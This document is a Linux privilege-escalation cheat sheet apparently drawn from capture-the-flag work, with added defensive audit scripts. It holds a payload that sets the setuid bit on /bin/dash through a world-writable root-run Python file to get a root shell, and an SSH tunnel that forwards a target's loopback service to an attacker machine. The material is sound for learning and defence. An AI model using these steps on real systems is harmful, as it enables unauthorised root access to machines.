Linux Priv Esc
Tools and commands for an initial post exploitation recon
Useful Priv esc enumeration scripts
LinEnum.sh
linux-exploit-suggester
linuxprivchecker.py
unixprivesc.sh
To see the running processes:
Check the version of installed software
dpkg -s <program name>
A way to enumerate users, groups, files, and permissions
find /home -printf "%f\t%p\t%u\t%g\t%m\n" 2>/dev/null | column -t
.bash_logout               /home/george/.bash_logout                  george  george  644
.bashrc                    /home/george/.bashrc                       george  george  644
torrenthoster.zip          /home/george/torrenthoster.zip             george  george  644
motd.legal-displayed       /home/george/.cache/motd.legal-displayed   george  george  644
.sudo_as_admin_successful  /home/george/.sudo_as_admin_successful     george  george  644
user.txt                   /home/george/user.txt                      george  george  644
.nano_history              /home/george/.nano_history                 root    root    600
.mysql_history             /home/george/.mysql_history                root    root    600
.bash_history              /home/george/.bash_history                 root    root    600
.profile                   /home/george/.profile                      george  george  644
Look for a specific package installed on a system
dpkg -l | grep -i <package>
Look for set UID files
find / -perm -4000 2>/dev/null
World-writable Python file run as root (SUID) - dash priv esc
os.system('chmod 4755 /bin/dash')
With the setuid bit set on /bin/dash, type dash
Running id will show that our euid (effective uid) is now root
We are now able to run commands as root
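As an added example that is not part of the original notes, the POSIX shell functions below audit a directory tree for the two conditions this section depends on: files writable by everyone (a script that root runs from cron or a wrapper can be edited by any local user) and files carrying the setuid bit, with a separate report of setuid copies of shells, which is exactly the artefact the chmod 4755 /bin/dash step leaves behind. The sample tree the script builds under a temporary directory is constructed for the demonstration; the function and file names are this example's own.

```shell
#!/bin/sh
# Added example: audit for world-writable files and setuid binaries.
# Not part of the original notes; the sample tree below is constructed.

# Print regular files under $1 that are writable by "other" (mode bit 0002).
# A world-writable script executed by root can be rewritten by any user.
find_world_writable() {
    find "$1" -type f -perm -0002 2>/dev/null | sort
}

# Print regular files under $1 with the setuid bit set (the page's
# `find / -perm -4000`, scoped to one directory for the demo).
find_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Report setuid files whose basename is a known shell. On a healthy
# system this list is empty; a hit is a strong sign of the dash trick.
find_setuid_shells() {
    find_setuid "$1" | while IFS= read -r f; do
        case "${f##*/}" in
            sh|dash|bash|zsh|ksh|csh|tcsh|fish) printf '%s\n' "$f" ;;
        esac
    done
}

# Build a constructed sample tree and print its path.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/opt/app"
    printf '#!/usr/bin/env python3\nprint("backup")\n' > "$d/opt/app/backup.py"
    chmod 666 "$d/opt/app/backup.py"     # world-writable script: finding
    printf '#!/bin/sh\n' > "$d/bin/dash"
    chmod 4755 "$d/bin/dash"             # setuid shell: critical finding
    printf '#!/bin/sh\n' > "$d/bin/ping"
    chmod 4755 "$d/bin/ping"             # setuid but not a shell: review
    printf 'x\n' > "$d/opt/app/README"
    chmod 644 "$d/opt/app/README"        # benign
    printf '%s\n' "$d"
}

# Stand-alone demo: audit the sample tree, then remove it.
run_demo() {
    d=$(make_sample_tree)
    echo "world-writable files:"; find_world_writable "$d"
    echo "setuid files:";         find_setuid "$d"
    echo "setuid shells:";        find_setuid_shells "$d"
    rm -rf "$d"
}

run_demo
```

To run the checks against a real host, call find_world_writable and find_setuid_shells with the directories you care about (for example /etc, /opt and /usr/local/bin) and diff the output against a known-good baseline taken when the host was built.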
Find which ports a server is listening on
netstat -an |grep LIST
Check if ASLR is enabled
cat /proc/sys/kernel/randomize_va_space
0
0 means ASLR is disabled; 1 means it is enabled (2 is full randomisation, which also randomises the heap)
Check for Locally running services and port forward them to our machine
netstat -natp |grep 127.0.0.1
Run this on the target Linux box
Port forwarding local ports to attacker machine
ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171
Run this command from your attacker machine,
then open the local port in a web browser on your attacker machine,
e.g. 127.0.0.1:52846/
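The grep in this section lists every line mentioning 127.0.0.1, including established connections. As an added example that is not part of the original notes, the shell function below parses netstat -natp output and prints only the listening sockets bound to a loopback address, with port and program name, which is the inventory a defender wants when reviewing which services rely on being loopback-only. The netstat output embedded here is constructed for the demonstration, and the function names are this example's own.

```shell
#!/bin/sh
# Added example: list loopback-only listeners from `netstat -natp` output.
# Not part of the original notes; the sample output below is constructed.

# Constructed sample in the column layout netstat -natp prints.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      1234/java
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      789/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1020/mysqld
tcp        0      0 10.10.10.171:22         10.10.14.5:50022        ESTABLISHED 2001/sshd
tcp6       0      0 ::1:631                 :::*                    LISTEN      456/cupsd'

# Read netstat -natp output on stdin; print "port program" for each socket
# in LISTEN state whose local address is loopback (127.0.0.0/8 or ::1).
loopback_listeners() {
    awk '$6 == "LISTEN" {
        addr = $4
        n = split(addr, parts, ":")
        port = parts[n]                                   # text after the last colon
        host = substr(addr, 1, length(addr) - length(port) - 1)
        if (host ~ /^127\./ || host == "::1") {
            prog = $7
            sub(/^[0-9]+\//, "", prog)                    # strip "PID/" prefix
            print port, prog
        }
    }' | sort -n
}

# Same check against the live host when netstat is installed.
live_loopback_listeners() {
    netstat -natp 2>/dev/null | loopback_listeners
}

# Stand-alone demo over the constructed sample.
printf '%s\n' "$SAMPLE_NETSTAT" | loopback_listeners
```

Compare the live output with the services you expect to be loopback-bound; anything that is there only because "it is not reachable from outside" needs its own authentication, since an SSH tunnel like the one in this section makes it reachable from any account that can log in.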